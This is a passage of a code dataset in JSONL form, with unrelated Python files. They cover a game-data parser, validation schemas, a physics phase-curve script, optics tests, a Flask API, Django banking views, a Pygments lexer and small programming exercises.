AbstractEddbFilter.applyFilters() is called for each filter class\n \"\"\"\n for eddbFilter in self.filters.values():\n eddbFilter.filterClass.prepareApplyFilters(eddbFilter.filterDictionary, eddbFilter.filteredSystems, eddbFilter.systemDictionary)\n\n def passOnResults(self):\n \"\"\"Pass on the results (the desired systems) to each filter class\"\"\"\n for eddbFilter in self.filters.values():\n eddbFilter.filterClass.useResults(eddbFilter.filteredSystems)\n\nclass EddbParserSingleProcess(AbstractEddbParser):\n\n def parseSystems(self):\n with open(os.path.join(self.dir, \"systems.csv\"), \"r\", encoding=\"utf8\") as listings_csv:\n i = 0\n listingsDataDump = csv.reader(listings_csv)\n\n print(\"Parsing listings.csv...\")\n for row in listingsDataDump:\n if listingsDataDump.line_num == 1:\n continue # skip first row\n i += 1\n\n for eddbFilter in self.filters.values(): \n if eddbFilter.filterClass.filterSystems(row):\n system = EliteSystem(row[2], float(row[3]), float(row[4]), float(row[5]))\n eddbID = int(row[0])\n eddbFilter.systemDictionary.setdefault(eddbID, system)\n eddbFilter.filterDictionary.setdefault(eddbID, {})\n if i % self.steps == 0:\n print(\"Parsed {0:,} systems so far...\".format(i))\n\n print(\"Done parsing listings.csv. Parsed a total of {0:,} systems\".format(i))\n for eddbFilter in self.filters.values():\n print(\"Found {0:,} systems matching the filters of {1}\".format(len(eddbFilter.filterDictionary.keys()), eddbFilter.filterClass.uniqueFilterName()))\n\n\n def parseBodies(self):\n print('Parsing bodies.jsonl...')\n with open(os.path.join(self.dir, \"bodies.jsonl\"), \"r\", encoding=\"utf8\") as bodies:\n i = 0\n for line in bodies:\n bodiesJson = json.loads(line)\n\n i += 1\n if i % self.steps == 0:\n print(\"Parsed {0:,} bodies so far...\".format(i))\n\n for eddbFilter in self.filters.values():\n if bodiesJson[\"system_id\"] in eddbFilter.systemDictionary:\n eddbFilter.filterClass.setFiltersBody(bodiesJson, eddbFilter.filterDictionary[bodiesJson[\"system_id\"]])\n\n print(\"Done parsing bodies.jsonl. Parsed a total of {0:,} bodies\".format(i))\n\nclass EddbParserHybrid(EddbParserSingleProcess):\n def __init__(self, dir: str, filters: List[AbstractEddbFilter], numberOfProcesses: int=6):\n EddbParserSingleProcess.__init__(self, dir, filters)\n self.numberOfProcesses = numberOfProcesses\n\n def parseBodies(self):\n # create queues for communication\n bodyQueue = mp.Queue(maxsize = 100)\n bodyOutQueue = mp.Queue()\n\n def bodyWorker(name, inQueue, outQueue, filters):\n localFilters = filters.copy()\n\n #print(\"bodyWorker {0} init\".format(name))\n while True:\n lines = inQueue.get()\n if not lines: break\n\n #print(\"bodyWorker {0} start\".format(name))\n for line in lines:\n bodiesJson = json.loads(line)\n for eddbFilter in localFilters:\n if bodiesJson[\"system_id\"] in eddbFilter.systemDictionary:\n eddbFilter.filterClass.setFiltersBody(bodiesJson, eddbFilter.filterDictionary[bodiesJson[\"system_id\"]])\n #print(\"bodyWorker {0} stop\".format(name))\n\n outQueue.put(localFilters)\n \n bodyWorkers = list()\n for i in range(self.numberOfProcesses):\n worker = mp.Process(target=bodyWorker, args=(i, bodyQueue, bodyOutQueue, list(self.filters.values())))\n bodyWorkers.append(worker)\n\n for worker in bodyWorkers:\n worker.start()\n\n print('Parsing bodies.jsonl...')\n with open(os.path.join(self.dir, \"bodies.jsonl\"), \"r\", encoding=\"utf8\") as bodies:\n lines = list()\n\n for iBodies, line in enumerate(bodies):\n lines.append(line)\n if iBodies % (self.steps / 10) == 0: # transferring too many lines takes too long\n bodyQueue.put(lines)\n lines = list()\n if (iBodies + 1) % self.steps == 0:\n print(\"Parsed {0:,} bodies so far...\".format(iBodies + 1))\n\n for worker in bodyWorkers:\n bodyQueue.put(None)\n print(\"Waiting for worker processes...\")\n for i in range(self.numberOfProcesses):\n eddbFilters = bodyOutQueue.get()\n print(\"Merging results of process #{0}...\". format(i + 1))\n # merge results from worker processes into the main process\n for eddbFilter in eddbFilters:\n for systemId, v in eddbFilter.filterDictionary.items():\n for filterName, filterValue in v.items():\n mergedValue = eddbFilter.filterClass.mergeMultiProcess(filterName, self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary[systemId].get(filterName, None) , filterValue)\n self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary[systemId][filterName] = mergedValue\n\n for worker in bodyWorkers:\n worker.join()\n print(\"Done parsing bodies.jsonl. Parsed a total of {0:,} bodies\".format(iBodies + 1))\n\nclass EddbParserMultiProcess(EddbParserHybrid):\n \"\"\"Multi process implementation of AbstractEddbParser. May not run on Windows.\"\"\"\n\n def __init__(self, dir: str, filters: List[AbstractEddbFilter], numberOfProcesses: int=6):\n EddbParserHybrid.__init__(self, dir, filters, numberOfProcesses)\n \n def parseSystems(self):\n # create queues for communication\n systemQueue = mp.Queue(maxsize = 10)\n systemOutQueue = mp.Queue()\n\n # function that is run in extra process\n def systemWorker(name, inQueue, outQueue, filters):\n localFilters = filters.copy()\n while True:\n rows = inQueue.get()\n if not rows: break\n #print(\"systemWorker {0} start\".format(name))\n csvRows = csv.reader(rows)\n for row in csvRows:\n for eddbFilter in localFilters: \n if eddbFilter.filterClass.filterSystems(row):\n system = EliteSystem(row[2], float(row[3]), float(row[4]), float(row[5]))\n eddbID = int(row[0])\n eddbFilter.systemDictionary.setdefault(eddbID, system)\n eddbFilter.filterDictionary.setdefault(eddbID, {})\n #print(\"systemWorker {0} end\".format(name))\n outQueue.put(localFilters)\n \n systemWorkers = list()\n for i in range(self.numberOfProcesses):\n worker = mp.Process(target=systemWorker, args=(i, systemQueue, systemOutQueue, list(self.filters.values())))\n systemWorkers.append(worker)\n\n for worker in systemWorkers:\n worker.start()\n\n with open(os.path.join(self.dir, \"systems.csv\"), \"r\", encoding=\"utf8\") as listings_csv:\n print(\"Parsing listings.csv...\")\n\n rows = list()\n for iSystems, line in enumerate(listings_csv):\n if iSystems == 0: continue # skip the 1st row\n rows.append(line)\n # to minimize inter-process communication, pass on number of \"steps\" lines\n if (iSystems + 1) % self.steps == 0:\n print(\"Parsed {0:,} systems so far...\".format(iSystems + 1))\n systemQueue.put(rows)\n rows = list()\n\n for worker in systemWorkers:\n systemQueue.put(None) # put termination signals into the queue\n print(\"Waiting for worker processes...\")\n for i in range(self.numberOfProcesses):\n eddbFilters = systemOutQueue.get()\n print(\"Merging results of process #{0}...\". format(i + 1))\n # merge results from worker processes into the main process. each system is unique: just copy the keys and values\n for eddbFilter in eddbFilters:\n self.filters[eddbFilter.filterClass.uniqueFilterName()].systemDictionary.update(eddbFilter.systemDictionary)\n self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary.update(eddbFilter.filterDictionary)\n for worker in systemWorkers:\n worker.join()\n\n print(\"Done parsing listings.csv. Parsed a total of {0:,} systems\".format(iSystems))\n for eddbFilter in self.filters.values():\n print(\"Found {0:,} systems matching the filters of {1}\".format(len(eddbFilter.filterDictionary.keys()), eddbFilter.filterClass.uniqueFilterName()))\n","sub_path":"Parser/EddbParser.py","file_name":"EddbParser.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"515524419","text":"import bson\nfrom cerberus import Validator\nfrom api.util import Bson\n\nrequest_validator_schema = {\n '_id': {\n 'type': 'string'\n },\n 'service_id': {\n 'type': 'string',\n 'check_with': Bson.validate_schema_id\n },\n 'method': {\n 'type': 'string',\n 'allowed': ['POST', 'PUT']\n },\n 'schema': {\n 'type': 'dict'\n },\n 'password_field': {\n 'type': 'string'\n },\n 'password_policy': {\n 'type': 'dict',\n 'schema': {\n 'length': {\n 'type': 'integer',\n 'min': 0\n },\n 'upper_case_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'numbers_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'specials_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'non_letters_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'strength': {\n 'type': 'float',\n 'min': 0.0,\n 'max': 1.0\n }\n }\n },\n 'err_response_code': {\n 'type': 'integer',\n }\n}\n\nrequest_validator = Validator(request_validator_schema)\n","sub_path":"api/request_validator/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"529586466","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nfrom sympy import pprint\n\nimport husimi_homo as model\nfrom list_tools import element_number_changed\n\n\n# brute force phase limits\n# ATTENTION, this code works only for first order phase transitions ending in a critical point, \n# such as paramagnetic-ferromagnetic and liquid-gas\ndef bf_phase_curves(ep=1.0, et=0.0, t_list = np.linspace(0.02,0.04,num=2), mu_list = np.linspace(-4.5,-1.5,num=10) ):\n \"\"\"\n Usage:\n > bf_phase_curves(ep=cep, et=cet, t_list = ct_list, mu_list = cmu_list ):\n # float ep: pair interaction \n # float et: triplet interaction\n # t_list: list of temperatures\n # mu_list: list of chemical potentials\n \"\"\"\n\n sl = [] # stability limits for the gas phase\n\n for t in t_list:\n # print('t = ', t)\n raw_data = [ model.eos_data(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] # one temperature\n index_sl = element_number_changed( raw_data ) \n\n if ( len(index_sl) == 2 ): # it is implicit that the data has two coexistences within its data\n min_liq = index_sl[ 0 ]\n max_gas = index_sl[ 1 ] - 1 # Be sure to choose limits, be sure to find up to two phases, etc... \n sl.append( [ t, mu_list[min_liq], mu_list[max_gas] ] ) \n\n elif ( len(index_sl) == 0 ) and ( len(sl) > 0 ):\n print(f\"t={t:3.2f}\")\n break\n elif ( len(index_sl) == 0 ) and ( len(sl) == 0 ):\n print(f\"No phase transition for t={t:3.2f}\\n\")\n print(\"Finishing...\\n\")\n break\n elif len(index_sl) == 1:\n print(f\"t = {t:3.2f} Expecting three regimes (gas, coexistence, liquid) but found only two...\\n\")\n\n return sl\n\n# def phase_coexistence(ep=1.0, et=0.0, t = 0.1, mu_list = np.linspace(-4.5,-1.5,num=4), ):\n \n# raw_data = [ model.eos_data(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] \n \n# # separating data into gas and liquid phase data\n# pure_gas = raw_data[:min_liq]\n# pure_gas = list(map( lambda x: x[0], pure_gas ))\n\n# pure_liq = raw_data[max_gas+1:]\n# pure_liq = list(map( lambda x: x[0], pure_liq ))\n\n# coex = [ x for x in raw_data if len(x) > 1]\n# gas.append( pure_gas + [ select_phase( data , select=min ) for data in coex ] )\n# liq.append( [ select_phase( data , select=max ) for data in coex ] + pure_liq )\n \n# # TODO: insert calculations for coexistence HERE!!!!!!\n\n\ndef bf_stability_limits (ep=1.0, et=0.0, mu_list = np.linspace(-4.5,-1.5,num=61), t=0.02 ):\n \"\"\"\n bf_stability_limits - This seems to be OK. \n \"\"\"\n sl = [] # stability limits (on chemical potential)\n\n phases = [ model.eos_num_roots(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] # one temperature, only the numbers\n \n for i in range(1,len(phases) ):\n \n if phases[i] > phases[i-1]:\n sl.append( mu_list[i] )\n elif phases[i] < phases[i-1]:\n sl.append( mu_list[i-1] ) \n\n if sl:\n sl = [t] + sl\n \n return sl\n\n\ndef rs_stability_limit (cep=1.0, cet=0.0, ct = 0.02, mui=-5.0, muf=-4.1, mu_points=10 , max_error = 10e-3 ): \n \"\"\"\n Usage:\n > rs_stability_limit (cep=1.0, cet=0.0, ct = 0.02, mui=-5.0, muf=-4.1, mu_points=10 , max_error = 10e-3 )\n \n # Comments: - Can search to right or left. \n # - rs stands for recursive search.\n \"\"\"\n\n\n sign = abs(muf-mui)/(muf-mui) # find to right or left\n error = abs(( muf-mui )/mu_points)\n \n \n sl = bf_stability_limits (ep=cep, et=cet, mu_list = np.linspace(mui,muf,num=mu_points), t=ct )\n \n if not sl:\n print('rs_stability_limit(): Stability limits not found in the first run.')\n return None\n\n mu = sl[1]\n \n while error > max_error:\n\n mui = mu - 2*sign*error # I had a problem with just one error... while approaching on the third order loop.\n muf = mu + 2*sign*error\n error = abs(( muf-mui )/mu_points)\n \n sl = bf_stability_limits (ep=cep, et=cet, mu_list = np.linspace(mui, muf,num=mu_points), t=ct )\n mu = sl[1]\n\n return [ct,mu]\n\n\ndef main():\n \"\"\"\n stability_limits.py\n 2019-02-21 Marco Barbosa - aureliobarbosa@unb.br\n \n Calculate stability limits of equation of state given by husimi_homo.py \n \"\"\"\n\n mui = -4.5; muf = -1.5; mu_points = 101 \n cmu_list = np.linspace(mui,muf,num=mu_points) # current mu_list\n \n\n ti = 0.02; tf = 0.62; t_points = 7\n ct_list = np.linspace(ti,tf,num=t_points)\n\n \n sl = bf_phase_curves(t_list=ct_list,mu_list = cmu_list)\n \n for data in sl:\n print(data)\n \n return None\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"python/phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"225931961","text":"import unittest\nimport envtest # modifies path\nfrom raytracing import *\n\ninf = float(\"+inf\")\n\n\nclass TestImagingPath(unittest.TestCase):\n def testImagingPathInfiniteFieldOfView(self):\n path = ImagingPath()\n path.append(System2f(f=10))\n self.assertEqual(path.fieldOfView(), inf)\n\n def testImagingPathInfiniteFieldOfView2(self):\n path = ImagingPath()\n path.append(System2f(f=10, diameter=10))\n self.assertEqual(path.fieldOfView(), inf)\n\n def testImagingPathInfiniteFieldOfView3(self):\n path = ImagingPath()\n path.append(System2f(f=10, diameter=10))\n path.append(Aperture(diameter=20))\n self.assertAlmostEqual(path.fieldOfView(), 20, 2)\n\n def testDisplayRangeWithFiniteLens(self):\n path = ImagingPath() # default objectHeight is 10\n path.append(Space(d=10))\n path.append(Lens(f=5, diameter=20))\n\n largestDiameter = 20\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testDisplayRangeWithObjectHigherThanLens(self):\n path = ImagingPath()\n path.objectHeight = 20\n path.append(Space(d=10))\n path.append(Lens(f=5, diameter=20))\n\n largestDiameter = path.objectHeight * 2\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testDisplayRangeWithEmptyPath(self):\n path = ImagingPath()\n\n largestDiameter = path.objectHeight * 2\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testEntrancePupilAIs0(self):\n space = Space(2)\n lens = Lens(10, 110)\n space2 = Space(10, diameter=50)\n elements = [space, lens, space2]\n path = ImagingPath(elements)\n self.assertIsNotNone(path.entrancePupil())\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"raytracing/tests/testsImagingPath.py","file_name":"testsImagingPath.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61854045","text":"def bs(arr,ele):\r\n start=0\r\n end=len(arr)-1\r\n while(start<=end):\r\n mid=start+((end-start)//2)\r\n if arr[mid]==ele:\r\n return mid\r\n elif arr[mid]>ele:\r\n res=mid\r\n end=mid-1\r\n else:\r\n start=mid+1\r\n return res\r\n\r\na=[1,2,3,5,6]\r\nprint(a[bs(a,4)])","sub_path":"ceil_in_array.py","file_name":"ceil_in_array.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"332317104","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom datastructures import FamilyStructure\n#from models import Person\n\napp = Flask(_name_)\napp.url_map.strict_slashes = False\nCORS(app)\n\n# create the jackson family object\njackson_family = FamilyStructure(\"Jackson\")\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef handle_invalid_usage(error):\n return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n return generate_sitemap(app)\n\n@app.route('/members', methods=['GET', 'POST', 'DELETE', 'PUT'])\n@app.route('/members/', methods=['GET', 'POST', 'DELETE', 'PUT'])\ndef members(member_id=None):\n\n if request.method == \"GET\":\n if member_id is None:\n return jsonify(jackson_family.get_all_members()), 200\n\n else:\n jack = jackson_family.get_member(member_id)\n if not jack:\n return jsonify({\"msg\":\"this ID not exist\"}), 400\n return jsonify(jack), 200\n\n\n elif request.method == \"POST\":\n idd = jackson_family._generateId()\n name = request.json.get(\"name\", \"\")\n if not name:\n return jsonify({\"msg\": \"name is required\"}), 400\n new_member = {\n \"id\": idd,\n \"first_name\": name,\n \"last_name\": \"Jackson\"\n }\n add = jackson_family.add_member(new_member)\n return jsonify(jackson_family.get_all_members()), 200\n\n\n elif request.method == \"DELETE\":\n jack = jackson_family.delete_member(member_id)\n if not jack:\n return jsonify({\"msg\":\"this ID not exist\"}), 400\n return jsonify(jackson_family.get_all_members()), 200\n \n\n@app.route(\"/example\", methods=[\"GET\",\"POST\"])\ndef example():\n # this is how you can use the Family datastructure by calling its methods\n members = jackson_family.get_all_members()\n response_body = {\n \"hello\": \"world\",\n \"family\": members\n }\n return jsonify(members), 200\n\n# this only runs if `$ python src/app.py` is executed\nif _name_ == '_main_':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=True)","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"202692189","text":"class hotelRoom:\n roomNumber = 0\n maxGuests = 0\n numGuests = 0\n nightsBooked = 0\n roomInUse = False\n\n # static variables\n countRoomsInUse = 0\n countTotalGuests = 0\n peekSeason = True\n\n def __init__(self, roomNumber_in=0, maxGuests_in=0):\n self.numGuests = 0\n self.nightsBooked = 0\n self.roomInUse = 0\n self.roomNumber = roomNumber_in\n self.maxGuests = maxGuests_in\n\n\n\n # static method - don't need self here\n @staticmethod\n def Cost_room():\n nightStayCost = 0\n if hotelRoom.peekSeason: # static variable\n nightStayCost += 250\n else:\n nightStayCost += 150\n return nightStayCost\n\n\n def check_in(self, numGuests_in=0, nightsBooked_in=0, roomInUse_in=True ):\n self.roomInUse = roomInUse_in\n self.numGuests = numGuests_in\n self.nightsBooked = nightsBooked_in\n hotelRoom.countRoomsInUse += 1\n hotelRoom.countTotalGuests += self.numGuests\n\n\n\n\n # # static method - don't need self here\n # @staticmethod\n def check_out(self):\n self.numGuests = 0\n self.nightsBooked = 0\n self.roomInUse = False\n hotelRoom.countRoomsInUse -= 1\n hotelRoom.countTotalGuests = 0\n\n\n # Dont actually need this but in case we did what a print def within our class\n # def my_print(self):\n # print('*****************')\n # print('** Hotel Costs **')\n # print('Total Guests: {}'.format(hotelRoom.countTotalGuests))\n # print('Total Rooms in Use: {}'.format(hotelRoom.countRoomsInUse))\n # if hotelRoom.peekSeason:\n # print(\"Peek Season: Yes\")\n # else:\n # print(\"Peek Season: No\")\n # #print('Room Cost: {}'.format()) # how to call return functions\n # print('Room Number: {}'.format(self.roomNumber))\n # print('Max Guests: {}'.format(self.maxGuests))\n # print('Number of Guests: {}'.format(self.numGuests))\n # print('Nights Booked: {}'.format(self.nightsBooked))\n # print('Room In Use: {}'.format(self.roomInUse))\n\n\n#class instance\n\n# Test this class in the main program body using the following:\n\n# • Create two rooms with appropriate arguments\nroom1 = hotelRoom(5,8) # init arguments\nroom2 = hotelRoom(10,12) # init arguments\n\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Pre Check In: {}'.format(hotelRoom.countRoomsInUse)) # 0\nprint('Total Guests Pre Check In: {}'.format(hotelRoom.countTotalGuests)) # 0\nprint('Peek Season: {}\\n'.format(hotelRoom.peekSeason)) # True\n\n# • Check in guests to both rooms using appropriate arguments\nroom1.check_in(2,10) # didn't need to pass in room in use as set to True\nroom2.check_in(5,20) # didn't need to pass in room in use as set to True\n\n# • Print the cost of each room\nprint(\"Room 1 Cost: €{}\".format(int(room1.Cost_room()) * (room1.nightsBooked)))\nprint(\"Room 2 Cost: €{}\\n\".format(int(room2.Cost_room()) *(room2.nightsBooked)))\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Post Check In: {}'.format(hotelRoom.countRoomsInUse)) # 0 # **** check how I got that right *****\nprint('Total Guests Post Check In: {}\\n'.format(hotelRoom.countTotalGuests)) # 0\n\n# Don't need this just had if want to print like this - room1.my_print()\n\n# • Check out guests from both rooms\nroom1.check_out()\nroom2.check_out()\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Post Check Out: {}'.format(hotelRoom.countRoomsInUse)) # 0 # **** check how I got that right *****\nprint('Total Guests Post Check Out: {}\\n'.format(hotelRoom.countTotalGuests)) # 0\n\n\n\n\n\n\n\n\n","sub_path":"Lectures, Labs & Exams/Labs/Lab 7/RB X00152190 Lab 7.py","file_name":"RB X00152190 Lab 7.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347946245","text":"# coding=utf-8\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .util.forms import *\nfrom apps.modelodb.models import ContaCorrente, ContaPoupanca, Deposito\n\n\ndef deposito(request):\n form = get_form(request)\n if request.method == \"POST\":\n form = preenche_form(request)\n if form.is_valid():\n valor = form.cleaned_data[\"valor\"] * 100\n tipo_conta = request.POST.get(\"tipo_conta\", \"\")\n num_conta = request.POST.get(\"conta\", \"\")\n try:\n conta = get_conta(request, tipo_conta, num_conta)\n conta.saldo += valor\n log_op(valor=valor, creditado=conta)\n conta.save()\n return render_success(\n request, \"Deposito realizado com sucesso.\"\n )\n except ObjectDoesNotExist:\n return render_error(request, \"Conta não encontrada.\", form)\n else:\n return render_error(request, \"Dados incorretos.\", form)\n return render(request, \"deposito/deposito.html\", {\"form\": form})\n\n\ndef get_form(request):\n formLogged = DepositoFormLogged({'tipo_conta': '1'})\n formNotLogged = DepositoFormNotLogged()\n if request.user.is_authenticated():\n form = formLogged\n else:\n form = formNotLogged\n return form\n\n\ndef preenche_form(request):\n if request.user.is_authenticated():\n form = DepositoFormLogged(request.POST)\n else:\n form = DepositoFormNotLogged(request.POST)\n return form\n\n\ndef log_op(valor, creditado):\n Deposito.objects.create(\n identificador=\"Deposito\", valor=valor, creditado=creditado\n )\n\n\ndef get_conta(request, tipo_conta, num_conta):\n # Param :\n # tipo_conta\n # 1 = Conta Corrente\n # 2 = Conta Poupança\n # num_conta\n # numero da conta caso não esteja logado\n # Esses valores são definidos no forms.py\n if request.user.is_authenticated():\n if tipo_conta == '1':\n return ContaCorrente.objects.get(usuario__id=request.user.id)\n elif tipo_conta == '2':\n return ContaPoupanca.objects.get(usuario__id=request.user.id)\n else:\n return get_conta_nao_logado(num_conta)\n\n\ndef get_conta_nao_logado(num_conta):\n num_conta_max = ContaPoupanca._meta.get_field('numero_conta').max_length\n if(len(str(num_conta)) == num_conta_max):\n return ContaPoupanca.objects.get(numero_conta=num_conta)\n return ContaCorrente.objects.get(numero_conta=num_conta)\n\n\ndef render_error(request, error_msg, form):\n messages.error(request, error_msg)\n return render(request, \"deposito/deposito.html\", {\"form\": form})\n\n\ndef render_success(request, success_msg):\n messages.success(request, success_msg)\n if request.user.is_authenticated():\n return render(request, \"atm/atm.html\")\n return redirect(\"autenticacao:login\")\n","sub_path":"apps/operacoes/deposito/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"186925969","text":"import sys\nimport collections\n\nn,k=map(int,input().split())\ns=input()\n\nchars = list(s)\nchars[k-1]=chars[k-1].lower()\n\nmojiretu=''\nfor x in chars:\n mojiretu += x\nprint(mojiretu)","sub_path":"Contest126/A_Changing_a_Character.py","file_name":"A_Changing_a_Character.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"392465388","text":"# -*- coding: utf-8 -*-\n#\n# Pygments lexer for Cretonne.\n\nfrom pygments.lexer import RegexLexer, bygroups, words\nfrom pygments.token import *\n\ndef keywords(*args):\n return words(args, prefix=r'\\b', suffix=r'\\b')\n\nclass CretonneLexer(RegexLexer):\n name = 'Cretonne'\n aliases = ['cton']\n filenames = ['*.cton']\n\n tokens = {\n 'root': [\n (r';.*?$', Comment.Single),\n # Strings are in double quotes, support \\xx escapes only.\n (r'\"([^\"\\\\]+|\\\\[0-9a-fA-F]{2})*\"', String),\n # A naked function name following 'function' is also a string.\n (r'\\b(function)([ \\t]+)(\\w+)\\b', bygroups(Keyword, Whitespace, String.Symbol)),\n # Numbers.\n (r'[-+]?0[xX][0-9a-fA-F]+', Number.Hex),\n (r'[-+]?0[xX][0-9a-fA-F]*\\.[0-9a-fA-F]*([pP]\\d+)?', Number.Hex),\n (r'[-+]?(\\d+\\.\\d+([eE]\\d+)?|[sq]NaN|Inf)', Number.Float),\n (r'[-+]?\\d+', Number.Integer),\n # Reserved words.\n (keywords('function'), Keyword),\n # Known attributes.\n (keywords('align', 'aligntrap', 'uext', 'sext', 'inreg'), Name.Attribute),\n # Well known value types.\n (r'\\b(b\\d+|i\\d+|f32|f64)(x\\d+)?\\b', Keyword.Type),\n # v = value\n # ss = stack slot\n (r'(v|ss)\\d+', Name.Variable),\n # ebb = extended basic block\n (r'(ebb)\\d+', Name.Label),\n # Match instruction names in context.\n (r'(=)( *)([a-z]\\w*)', bygroups(Operator, Whitespace, Name.Function)),\n (r'^( *)([a-z]\\w*\\b)(?! *[,=])', bygroups(Whitespace, Name.Function)),\n # Other names: results and arguments\n (r'[a-z]\\w*', Name),\n (r'->|=|:', Operator),\n (r'[{}(),.]', Punctuation),\n (r'[ \\t]+', Text),\n ]\n }\n\ndef setup(app):\n \"\"\"Setup Sphinx extension.\"\"\"\n app.add_lexer('cton', CretonneLexer())\n\n return { 'version' : '0.1' }\n","sub_path":"docs/cton_lexer.py","file_name":"cton_lexer.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"123769127","text":"from nltk.corpus import words\nimport random\n\nclass WordSearch:\n def __init__(self, numPairs, gridSize=10):\n self.gridSize = gridSize\n self.numPairs = numPairs\n self.word_list = [word for word in words.words() if 3 <= len(word) <= 3]\n self.grid = self.init_grid()\n self.pairs = self.init_pairs()\n self.intersections = []\n\n def fill_grid(self, populate=False, tries=100):\n # Test for viable positions\n for pair in self.pairs:\n minx = 0\n maxx = self.gridSize - len(pair.horizontal_word)\n miny = pair.intersect[1]\n maxy = self.gridSize - len(pair.vertical_word) + pair.intersect[1]\n while tries > 0:\n word1_x = random.randint(minx, maxx)\n word1_y = random.randint(miny, maxy)\n word2_x = word1_x + pair.intersect[0]\n word2_y = word1_y - pair.intersect[1]\n if self.valid_placement(pair, word1_x, word1_y, word2_x, word2_y):\n self.place_pair(pair, word1_x, word1_y, word2_x, word2_y)\n break\n tries -= 1\n self.add_buffer()\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if not self.grid[row][col]:\n self.grid[row][col] = Block(-1, False, \"\")\n self.expand()\n if populate:\n self.add_random_letters()\n\n # Check if given coordinates are valid\n def valid_placement(self, pair, word1_x, word1_y, word2_x, word2_y):\n # horizontal\n print(pair.horizontal_word, pair.vertical_word, word1_x, word1_y, word2_x, word2_y)\n for col in range(word1_x, word1_x + len(pair.horizontal_word)):\n if self.grid[word1_y][col]:\n return False\n\n # vertical\n for row in range(word2_y, word2_y + len(pair.vertical_word)):\n if self.grid[row][word2_x]:\n return False\n\n return True\n\n # Insert the pair into our grid\n def place_pair(self, pair, word1_x, word1_y, word2_x, word2_y):\n for i in range(len(pair.horizontal_word)):\n intersect = i == pair.intersect[0]\n self.grid[word1_y][word1_x + i] = Block(self.pairs.index(pair), intersect, pair.horizontal_word[i])\n for i in range(len(pair.vertical_word)):\n intersect = i == pair.intersect[1]\n self.grid[word2_y + i][word2_x] = Block(self.pairs.index(pair), intersect, pair.vertical_word[i])\n if intersect:\n self.intersections.append(self.grid[word2_y + i][word2_x])\n\n # Fill grid with random lettered Blocks\n def add_random_letters(self):\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if self.grid[row][col].pairId == -1:\n self.grid[row][col].letter = random.choice(alphabet)\n\n # Find location of the block\n def findBlock(self, block):\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if self.grid[row][col] == block:\n return (col, row)\n \"\"\"\n We initially add letters to grid, add buffers around left and and top of current grid. And then at every \n intersect we push out the rows and cols up and to the right.\n \"\"\"\n def expand(self):\n for i in range(len(self.intersections) - 1):\n intersectionBlock = self.intersections[i]\n intersectionBlockPosition = self.findBlock(intersectionBlock)\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n print(self)\n block = self.grid[row][col]\n if not intersectionBlock.in_pair(block.pairId):\n if row < intersectionBlockPosition[1] and col < intersectionBlockPosition[0]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row + 1][col + 1].pairId, row + 1, col + 1)\n elif row < intersectionBlockPosition[1]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row + 1][col].pairId, row + 1, col)\n elif col < intersectionBlockPosition[0]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row][col + 1].pairId, row, col + 1)\n else:\n pass\n\n for i in 